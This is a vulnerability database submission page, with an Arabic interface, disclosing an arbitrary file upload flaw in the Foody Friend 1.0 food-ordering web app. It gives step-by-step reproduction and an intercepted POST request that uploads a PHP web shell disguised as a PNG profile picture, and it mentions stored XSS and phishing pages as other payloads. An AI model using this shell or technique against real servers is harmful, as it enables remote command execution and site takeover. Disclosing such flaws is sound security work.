إرسال #181276: Foody Friend 1.0 - Arbitrary File Uploadالمعلومات

عنوانFoody Friend 1.0 - Arbitrary File Upload
الوصف# Exploit Title: Foody Friend 1.0 - Arbitrary File Upload # Exploit Author: skalvin aka (CraCkEr) # Date: 12/07/2023 # Vendor: Bug Finder # Vendor Homepage: https://bugfinder.net/ # Software Link: https://bugfinder.net/product/foody-friend-a-saas-based-web-app-food-ordering-bot-for-telegram-and-messenger/25 # Tested on: Windows 10 Pro # Impact: Allows User to upload files to the web server ## Description Allow the Attacker to overwrite critical files by uploading a shell and executing commands on the server, enabling a wide range of attacks, such as server-side and client-side exploits. ## Steps to Reproduce: 1. Login as [Normal User] 2. In [User Dashboard] go to [Edit profile] 3. Choose profile picture & Upload any Image & Click on [Save Changes] 4. Catch the POST Request with [Burp Proxy Intercept] 5. Inject your [Evil-Code] - [phpshell] or [Persistent/Stored XSS] or [Phishing Page] POST /user/profile HTTP/2 ----------------------------------------------------------- Content-Disposition: form-data; name="profile_picture"; filename="shell.png" Content-Type: image/png <?php echo system($_GET['command']); ?> <---- ----------------------------------------------------------- 6. Send the Request 7. Right Click on Your Profile Picture [Copy the Path of the Image] 8. Access your Uploded Evil file on this Path: https://website/assets/upload/userProfile/[SHELL]-[Persistent-XSS] [-] Done
المستخدم
 skalvin (UID 49463)
ارسال12/07/2023 01:08 AM (3 سنوات منذ)
الاعتدال20/07/2023 09:59 AM (8 days later)
الحالةتمت الموافقة
إدخال VulDB235064 [Bug Finder Foody Friend 1.0 Profile Picture /user/profile profile_picture تجاوز الصلاحيات]
النقاط17

Do you need the next level of professionalism?

Upgrade your account now!